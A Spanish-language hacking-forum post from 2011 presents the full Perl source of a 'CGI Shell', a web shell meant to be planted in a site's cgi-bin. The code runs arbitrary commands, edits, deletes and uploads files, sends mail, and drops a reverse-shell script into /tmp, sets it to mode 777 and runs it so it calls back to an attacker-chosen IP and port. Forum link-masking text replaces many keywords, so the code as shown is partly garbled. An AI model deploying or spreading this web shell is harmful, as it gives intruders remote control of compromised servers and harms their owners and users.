comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] CGI Shell

  • 0 Respuestas
  • 918 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:38:00 pm »
Hola a todos

Hoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-bin

Esta shell tiene las sig opciones

* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails

Código: Perl
  1. #!"\xampp\perl\bin\perl.exe"
  2. #
  3. #CGI Shell 0.1
  4. #
  5. #(C) Doddy Hackman 2011
  6. #
  7. #
  8.  
  9. use CGI;
  10. use Cwd;
  11. use HTML::Entities;
  12. use Net::SMTP;
  13.  
  14. my %rta;
  15.  
  16. my $que = new CGI;
  17. my @ques = $que->param;
  18.  
  19. for(@ques) {
  20. $rta{$_} = $que->param($_);
  21. }
  22.  
  23.  
  24. You are not allowed to view links. Register or Login "Content-type:text/html\n\n";
  25. You are not allowed to view links. Register or Login "
  26.  
  27. <style type=text/css>
  28.  
  29.  
  30. .main {
  31. margin                  : -287px 0px 0px -490px;
  32. border                  : White solid 1px;
  33. BORDER-COLOR: #00FF00;
  34. }
  35.  
  36.  
  37. #pie {
  38. position: absolute;
  39. bottom: 0;
  40. }
  41.  
  42. body,a:link {
  43. background-color: #000000;
  44. color:#00FF00;
  45. Courier New;
  46. cursor:crosshair;
  47. font-size: small;
  48. }
  49.  
  50. input,table.outset,table.bord,table,textarea,select {
  51. font: normal 10px Verdana, Arial, Helvetica,
  52. sans-serif;
  53. background-color:black;color:#00FF00;
  54. border: solid 1px #00FF00;
  55. border-color:#00FF00
  56. }
  57.  
  58. a:link,a:visited,a:active {
  59. color: #00FF00;
  60. font: normal 10px Verdana, Arial, Helvetica,
  61. sans-serif;
  62. text-decoration: none;
  63. }
  64.  
  65. </style>
  66.  
  67. <title>CGI Shell (C) Doddy Hackman 2011</title>
  68. <h2><center>CGI Shell</center></h2>
  69.  
  70. ";
  71.  
  72. if ($rta{'filex'}) {
  73.  
  74. You are not allowed to view links. Register or Login FILE ,">>".$rta{'todir'}."/".$rta{'filex'};
  75. while($bytes = You are not allowed to view links. Register or Login($rta{'filex'},$todo, 1024)) {
  76. You are not allowed to view links. Register or Login FILE $todo;
  77. }
  78. You are not allowed to view links. Register or Login FILE;
  79.  
  80. You are not allowed to view links. Register or Login "<script>alert('File Uploaded');</script>";
  81.  
  82. }
  83.  
  84. if ($rta{'codefile'}) {
  85.  
  86. You are not allowed to view links. Register or Login($rta{'filecode'});
  87.  
  88. You are not allowed to view links. Register or Login (FILE,">>".$rta{'filecode'});
  89. You are not allowed to view links. Register or Login FILE $rta{'codefile'}."\n";
  90. You are not allowed to view links. Register or Login FILE;
  91.  
  92. You are not allowed to view links. Register or Login "<script>alert('File Changed');</script>";
  93.  
  94. }
  95.  
  96. if ($rta{'loadfile'}) {
  97. You are not allowed to view links. Register or Login "<form action='' method=POST>";
  98. You are not allowed to view links. Register or Login "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";
  99.  
  100. if (-f $rta{'loadfile'}) {
  101.  
  102. You are not allowed to view links. Register or Login "<center><textarea name=codefile cols=70 rows=70>";
  103.  
  104. You are not allowed to view links. Register or Login (FILE,$rta{'loadfile'});
  105. @words = <FILE>;
  106. You are not allowed to view links. Register or Login FILE;
  107.  
  108. for (@words) {
  109. You are not allowed to view links. Register or Login HTML::Entities::encode($_);
  110. }
  111. You are not allowed to view links. Register or Login "
  112. </textarea></center>
  113. <input type=hidden name=filecode value=".$rta{'loadfile'}.">
  114. <br><br><center><input type=submit value=Save></center><br><br>
  115. </form>
  116. ";
  117.  
  118. You are not allowed to view links. Register or Login(1);
  119. }
  120. }
  121.  
  122. You are not allowed to view links. Register or Login "
  123. <br><br>
  124. <b>Console</b>
  125. <br><br>
  126. <fieldset>";
  127.  
  128.  
  129. if ($rta{'cmd'}) {
  130. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login($rta{'cmd'});
  131. }
  132.  
  133. elsif ($rta{'mail'}) {
  134.  
  135. my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or You are not allowed to view links. Register or Login("[-] Error");
  136. $send->mail($rta{'mail'});
  137. $send->to($rta{'to'});  
  138. $send->data();
  139. $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
  140. $send->dataend();
  141. $send->quit();
  142.  
  143. }
  144.  
  145.  
  146. elsif ($rta{'loadir'}) {
  147.  
  148. if (-d $rta{'loadir'}) {
  149.  
  150. You are not allowed to view links. Register or Login DIR,$rta{'loadir'};
  151. my @archivos = You are not allowed to view links. Register or Login DIR;
  152. You are not allowed to view links. Register or Login DIR;
  153.  
  154. for(@archivos) {
  155. if (-d $_) {
  156. You are not allowed to view links. Register or Login "<b>".$_."</b><br>";      
  157. } else {
  158. You are not allowed to view links. Register or Login $_."<br>";
  159. }}}}
  160.  
  161. elsif (-f $rta{'delfile'}) {
  162. if (You are not allowed to view links. Register or Login($rta{'delfile'})) {
  163. You are not allowed to view links. Register or Login "<script>alert('File Deleted');</script>";
  164. } else {
  165. You are not allowed to view links. Register or Login "<script>alert('Error');</script>";
  166. }
  167. }
  168.  
  169. elsif (-d $rta{'deldir'}) {
  170. if (You are not allowed to view links. Register or Login($rta{'deldir'})) {
  171. You are not allowed to view links. Register or Login "<script>alert('Directory Deleted');</script>";
  172. } else {
  173. You are not allowed to view links. Register or Login "<script>alert('Error');</script>";
  174. }
  175. }
  176.  
  177. elsif ($rta{'ipconnect'}) {
  178.  
  179. $code = '
  180. #!usr/bin/perl
  181. #Reverse Shell 0.1
  182. #By Doddy H
  183.  
  184. use IO::Socket;
  185.  
  186. print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";
  187.  
  188. unless (@ARGV == 2) {
  189. print "[Sintax] : $0 <host> <port>\n\n";
  190. exit(1);
  191. } else {
  192. print "[+] Starting the connection\n";
  193. print "[+] Enter in the system\n";
  194. print "[+] Enjoy !!!\n\n";
  195. conectar($ARGV[0],$ARGV[1]);
  196. tipo();
  197. }
  198.  
  199. sub conectar {
  200. socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
  201. connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
  202. open (STDIN,">&REVERSE");
  203. open (STDOUT,">&REVERSE");
  204. open (STDERR,">&REVERSE");
  205. }
  206.  
  207. sub tipo {
  208. print "\n[*] Reverse Shell Starting...\n\n";
  209. if ($^O =~/Win32/ig) {
  210. infowin();
  211. system("cmd.exe");
  212. } else {
  213. infolinux();
  214. #root();  
  215. system("export TERM=xterm;exec sh -i");
  216. }
  217. }
  218.  
  219. sub infowin {
  220. print "[+] Domain Name : ".Win32::DomainName()."\n";
  221. print "[+] OS Version : ".Win32::GetOSName()."\n";
  222. print "[+] Username : ".Win32::LoginName()."\n\n\n";
  223. }
  224.  
  225. sub infolinux {
  226. print "[+] System information\n\n";
  227. system("uname -a");
  228. print "\n\n";
  229. }
  230.  
  231. #The End
  232. ';
  233.  
  234. if ($^O =~/Win32/ig) {
  235. You are not allowed to view links. Register or Login (FILE,">>"."back.pl");
  236. You are not allowed to view links. Register or Login("back.pl","777");
  237. } else {
  238. You are not allowed to view links. Register or Login (FILE,">>"."/tmp/back.pl");
  239. You are not allowed to view links. Register or Login("/tmp/back.pl","777");
  240. }
  241.  
  242. You are not allowed to view links. Register or Login FILE $code;
  243. You are not allowed to view links. Register or Login FILE;
  244.  
  245. if ($^O == "MSWin32") {
  246. You are not allowed to view links. Register or Login("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
  247. } else {
  248. You are not allowed to view links. Register or Login("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
  249. }
  250. } else {
  251.  
  252. You are not allowed to view links. Register or Login DIR,getcwd();
  253. my @archivos = You are not allowed to view links. Register or Login DIR;
  254. You are not allowed to view links. Register or Login DIR;
  255.  
  256. for(@archivos) {
  257. if (-d $_) {
  258. You are not allowed to view links. Register or Login "<b>".$_."</b><br>";      
  259. } else {
  260. You are not allowed to view links. Register or Login $_."<br>";
  261. }}
  262.  
  263. }
  264.  
  265. You are not allowed to view links. Register or Login "</fieldset>
  266. <br><br>
  267. <form action='' method=GET>
  268. <b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
  269. </form>
  270. <form action='' method=GET>
  271. <B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
  272. </form>
  273. <form action='' method=GET>
  274. <b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
  275. </form>
  276. <form action='' method=GET>
  277. <b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
  278. </form>
  279. <form action='' method=GET>
  280. <b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
  281. </form>
  282. <form enctype='multipart/form-data' method=POST>
  283. <br><b>Upload File</b> : <input type=file name=filex><br><br>
  284. <b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
  285. <input type=submit value=Upload>
  286. </form>
  287. <br><B>Mailer</b><br><br>
  288. <form action='' method=GET>
  289. <b>Mail</b> : <input type=text name=mail><br>
  290. <b>To</b> : <input type=text name=to><br>
  291. <b>Subject</B> : <input type=text name=subject><br>
  292. <B>Body</B> : <input type=text name=body><br><br>
  293. <input type=submit value=Send>
  294. </form>
  295. <br><br><b>ReverseShell</b><br><br>
  296. <form action='' method=GET>
  297. <b>IP</B> : <input type=text name=ipconnect><br>
  298. <b>Port</B> : <input type=text name=port><br>
  299. <br><input type=submit value=Connect></form><br><br>
  300.  
  301. ";
  302.  
  303.  
  304. # ¿ The End ?
  305.  

Si lo quieren descargar desde sourceforge

Código: You are not allowed to view links. Register or Login
https://sourceforge.net/projects/cgishellx/
« Última modificación: Marzo 14, 2015, 09:57:46 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3003
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1409
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1178
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1330
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1038
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear